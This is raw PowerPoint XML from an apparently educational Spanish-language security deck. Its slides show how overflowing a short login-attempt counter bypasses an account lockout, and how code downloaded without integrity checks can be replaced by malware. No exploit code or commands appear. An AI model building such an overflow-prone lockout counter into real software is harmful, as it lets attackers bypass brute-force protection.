            <a:ext cx="1606846" cy="307736"/>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en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cuenta bloqueada!</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Google Shape;301;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F784D92A-2F6B-5E27-9434-C4B7C2A1AB43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2583501" y="5288238"/>
            <a:ext cx="2630696" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Google Shape;302;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9641FC81-4138-CB5C-1508-5D9330B6F36D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566011" y="5333674"/>
            <a:ext cx="2639441" cy="768157"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Google Shape;303;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEDC4250-358D-B6C8-60E5-06F8F1E55EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-961573">
            <a:off x="2693586" y="5554376"/>
            <a:ext cx="1468287" cy="307736"/>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en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Login autorizado!</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Google Shape;306;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1308212-027D-7A0D-CACB-06EBD911EB42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3702076" y="2379041"/>
            <a:ext cx="252336" cy="307736"/>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en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Google Shape;307;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F530B1E-92A2-9EF5-DD46-EF3CAA8A7D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3976755" y="4979463"/>
            <a:ext cx="1141858" cy="307736"/>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en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Credenciales</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;308;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10173B7-1883-E336-1818-317BDB81CBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418074" y="2879145"/>
            <a:ext cx="1609281" cy="32312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500"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>attempts = 32766</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;309;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E705D9C0-18D8-9BD0-3741-C7F03545082D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418074" y="3704705"/>
            <a:ext cx="1662240" cy="553957"/>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500"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>attempts = 32767 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>(MAX_SHORT)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;310;p21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE045150-2FDD-FE62-DC18-7C8E2492DDD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418491" y="5014749"/>
            <a:ext cx="1834262" cy="78479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0000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>attempts = -32768 </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>(&lt; MAX_ATTEMPTS)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1371010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C3C7-1406-1E4B-AA89-63A52DA31801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362953" y="284271"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Descarga de código sin verificaciones de integridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62DC393D-D86F-E94E-B2A1-71CDE13F3BA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6116688" y="1530703"/>
            <a:ext cx="5561825" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2800" dirty="0"/>
              <a:t>Cuando el software es descargado, sobre todo en conexiones inseguras, puede ser reemplazado por malware. Si no se utiliza una verificación de integridad, el usuario puede terminar ejecutando el archivo malicioso</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7CBCAAA-F90F-6CCC-24D1-CC8F37610289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;315;p22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD1CAB3-32A6-DA7B-660D-AC603C7EC4A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1639962" y="2998227"/>
            <a:ext cx="1" cy="1763643"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="21600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="123825" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="222A35"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8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nvGrpSpPr>
          <p:cNvPr id="10" name="Google Shape;316;p22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30D7F083-A7E8-757F-877F-2C2E41979040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1204682" y="1667504"/>
            <a:ext cx="870561" cy="1330654"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="870560" cy="1330653"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Google Shape;317;p22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C07AF095-95E0-260B-C6C6-8BC84121A7C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="870560" cy="1330653"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="3533"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="18067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16200" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="44546A"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Google Shape;318;p22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E2C1E1-E66F-D148-DB31-54F5C0B7D6C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="652919" y="-1"/>
              <a:ext cx="217640" cy="1330653"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="3533"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="18067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="20000"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Google Shape;319;p22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5EE614A-C043-3E4B-D64B-7E05FFC48788}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="870560" cy="217641"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="21600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16200" y="21600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="20000"/>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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Google Shape;320;p22" descr="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8603A3A1-71B3-3342-3AC8-02BBB458D412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="80810" t="32962" r="2089" b="37636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2919928" y="2078516"/>
            <a:ext cx="718458" cy="872838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Google Shape;321;p22" descr="Graphic 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93B35F05-5588-7A26-134A-58F7F3145207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163712" y="4695054"/>
            <a:ext cx="952501" cy="952501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;322;p22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FDDE61-E093-09C4-347A-C61175A11A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376942" y="5654249"/>
            <a:ext cx="533659"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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;323;p22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AD9E6C-4B0B-BC6E-733A-F7E0E572C54D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2810683" y="2957727"/>
            <a:ext cx="936835"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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Google Shape;324;p22" descr="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2D3B7EF-AA66-F64B-9277-3BC61D3E7082}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="80810" t="61895" r="2089" b="6903"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2919928" y="4365244"/>
            <a:ext cx="718458" cy="926276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Google Shape;325;p22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8635957-A3A7-9541-1FD4-1B5AF6F76EBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2817939" y="5299502"/>
            <a:ext cx="922323"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C00000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Malware</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Google Shape;326;p22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3706AD7-7920-EADF-8306-B4C5E144EEA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622481" y="3162465"/>
            <a:ext cx="2034962" cy="64629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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
